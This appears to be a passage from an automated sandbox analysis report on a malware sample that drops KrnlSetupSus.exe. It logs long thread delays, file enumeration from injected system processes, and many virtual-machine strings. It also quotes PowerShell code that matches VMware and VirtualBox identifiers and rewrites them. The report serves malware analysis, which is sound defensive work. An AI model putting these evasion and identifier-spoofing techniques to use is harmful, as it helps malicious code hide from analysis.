Source: C:\Windows\System32\svchost.exe TID: 8020 | Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 8020 | Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8028 | Thread sleep count: 43 > 30
Source: C:\Windows\System32\svchost.exe TID: 8028 | Thread sleep time: -43000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8036 | Thread sleep count: 257 > 30
Source: C:\Windows\System32\svchost.exe TID: 8036 | Thread sleep time: -257000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8052 | Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 8052 | Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8072 | Thread sleep count: 227 > 30
Source: C:\Windows\System32\svchost.exe TID: 8072 | Thread sleep time: -227000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8080 | Thread sleep count: 240 > 30
Source: C:\Windows\System32\svchost.exe TID: 8080 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8088 | Thread sleep count: 238 > 30
Source: C:\Windows\System32\svchost.exe TID: 8088 | Thread sleep time: -238000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8096 | Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096 | Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8104 | Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 8104 | Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8144 | Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 8144 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8160 | Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 8160 | Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8168 | Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 8168 | Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8176 | Thread sleep count: 255 > 30
Source: C:\Windows\System32\svchost.exe TID: 8176 | Thread sleep time: -255000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8184 | Thread sleep count: 246 > 30
Source: C:\Windows\System32\svchost.exe TID: 8184 | Thread sleep time: -246000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 608 | Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 608 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2736 | Thread sleep count: 227 > 30
Source: C:\Windows\System32\svchost.exe TID: 2736 | Thread sleep time: -227000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3068 | Thread sleep count: 66 > 30
Source: C:\Windows\System32\svchost.exe TID: 3068 | Thread sleep time: -66000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2068 | Thread sleep count: 230 > 30
Source: C:\Windows\System32\svchost.exe TID: 2068 | Thread sleep time: -230000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5836 | Thread sleep count: 64 > 30
Source: C:\Windows\System32\svchost.exe TID: 5836 | Thread sleep time: -64000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4564 | Thread sleep count: 65 > 30
Source: C:\Windows\System32\svchost.exe TID: 4564 | Thread sleep time: -65000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6732 | Thread sleep count: 235 > 30
Source: C:\Windows\System32\svchost.exe TID: 6732 | Thread sleep time: -235000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6884 | Thread sleep count: 254 > 30
Source: C:\Windows\System32\svchost.exe TID: 6884 | Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5848 | Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 5848 | Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 6772 | Thread sleep count: 166 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 6772 | Thread sleep time: -166000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5644 | Thread sleep count: 227 > 30
Source: C:\Windows\System32\svchost.exe TID: 5644 | Thread sleep time: -227000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5660 | Thread sleep count: 54 > 30
Source: C:\Windows\System32\svchost.exe TID: 5660 | Thread sleep time: -54000s >= -30000s
Source: C:\ProgramData\KrnlSetupSus.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe | Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe | Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\ProgramData\KrnlSetupSus.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\KrnlSetupSus.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\KrnlSetupSus.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\KrnlSetupSus.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C56D654 FindFirstFileExW
Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C56D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD0D654 FindFirstFileExW
Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD0D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E99175D654 FindFirstFileExW
Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E99175D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCED7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCED654 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709DD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709DD654 FindFirstFileExW
Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB158D654 FindFirstFileExW
Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB158D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F066D654 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F066D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBBD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBBD654 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD4D654 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD4D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3BD654 FindFirstFileExW
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3BD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 600000
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599890
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599781
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599672
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599562
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599448
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599338
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599233
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599124
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 599015
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598906
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598796
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598687
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598578
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598465
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598359
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598248
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 598115
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597999
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597890
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597777
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597672
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597562
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597452
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597343
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597229
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597125
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 597014
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596906
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596797
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596687
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596578
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596468
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596345
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596218
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596109
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 596000
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 595889
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 595125
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594998
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594890
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594781
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594671
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594562
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594453
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594343
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594234
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594124
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 594014
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 593906
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 593796
                              Source: C:\ProgramData\KrnlSetupSus.exe | Thread delayed: delay time: 593687
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\dllhost.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                              Source: svchost.exe, 00000015.00000000.1538124279.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2791081591.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                              Source: svchost.exe, 00000015.00000002.2792411923.0000024BD3643000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmci
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: VMware SATA CD00
                              Source: svchost.exe, 00000012.00000002.2842600921.0000022383012000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: NECVMWarVMware SATA CD00
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                              Source: svchost.exe, 0000002B.00000000.1668423304.000001FC05B00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000000.1667535846.000001FC0522B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2781041464.000001FC05245000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000000.1667574573.000001FC05245000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.2779578130.000001FC0522B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                              Source: svchost.exe, 00000027.00000002.2774314138.000001A6DDA60000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NTFS;;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: svchost.exe, 00000027.00000002.2776549505.000001A6DDB02000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.21.dr | Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.dr | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                              Source: svchost.exe, 00000015.00000000.1538023734.0000024BD35D0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba6
                              Source: dwm.exe, 0000000C.00000003.2106459407.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                              Source: System.evtx.21.dr | Binary or memory string: VMCI: Using capabilities (0x1c).
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.dr | Binary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba68
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.dr | Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
                              Source: KrnlSetupSus.exe.0.dr | Binary or memory string: vmware
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: nonicNECVMWarVMware SATA CD00
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                              Source: svchost.exe, 00000015.00000002.2824460745.0000024BD5025000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmcir:m
                              Source: svchost.exe, 00000015.00000000.1538941161.0000024BD3FE2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dowvmci
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: VMware
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.dr | Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                              Source: svchost.exe, 00000027.00000002.2776549505.000001A6DDB02000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.dr | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                              Source: svchost.exe, 00000027.00000002.2776549505.000001A6DDB02000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.21.dr | Binary or memory string: VMware Virtual disk 2.0 6000c29198182f16b7176b0e680deba6PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                              Source: lsass.exe, 0000000A.00000000.1462343927.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: nonicVMware Virtual disk 6000c29198182f16b7176b0e680deba6
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 00000027.00000002.2775443523.000001A6DDA7C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                              Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.21.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
                              Source: KrnlSetupSus.exe.0.dr | Binary or memory string: awErkRcloZTlIvVMCiVK0
                              Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.21.dr | Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: storahciNECVMWarVMware SATA CD00
                              Source: svchost.exe, 00000027.00000002.2774314138.000001A6DDA60000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: Microsoft-Windows-Partition%4Diagnostic.evtx.21.dr | Binary or memory string: VMwareVirtual disk2.06000c29198182f16b7176b0e680deba6PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                              Source: KrnlSetupSus.exe, 00000003.00000002.2829186248.000000001BD52000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462069296.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2780494021.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.1466674795.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2773910162.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1503770067.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2777874109.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2765234124.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1510141758.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2784677676.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.1514913660.0000022382041000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: lsass.exe, 0000000A.00000000.1462343927.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
                              Source: svchost.exe, 00000027.00000002.2774314138.000001A6DDA60000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: LSI_SASVMware Virtual disk 6000c29198182f16b7176b0e680deba6
                              Source: svchost.exe, 00000020.00000002.2770571570.000001EC20C2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.dr | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                              Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.21.dr | Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                              Source: svchost.exe, 0000000B.00000000.1466851581.000001587065D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
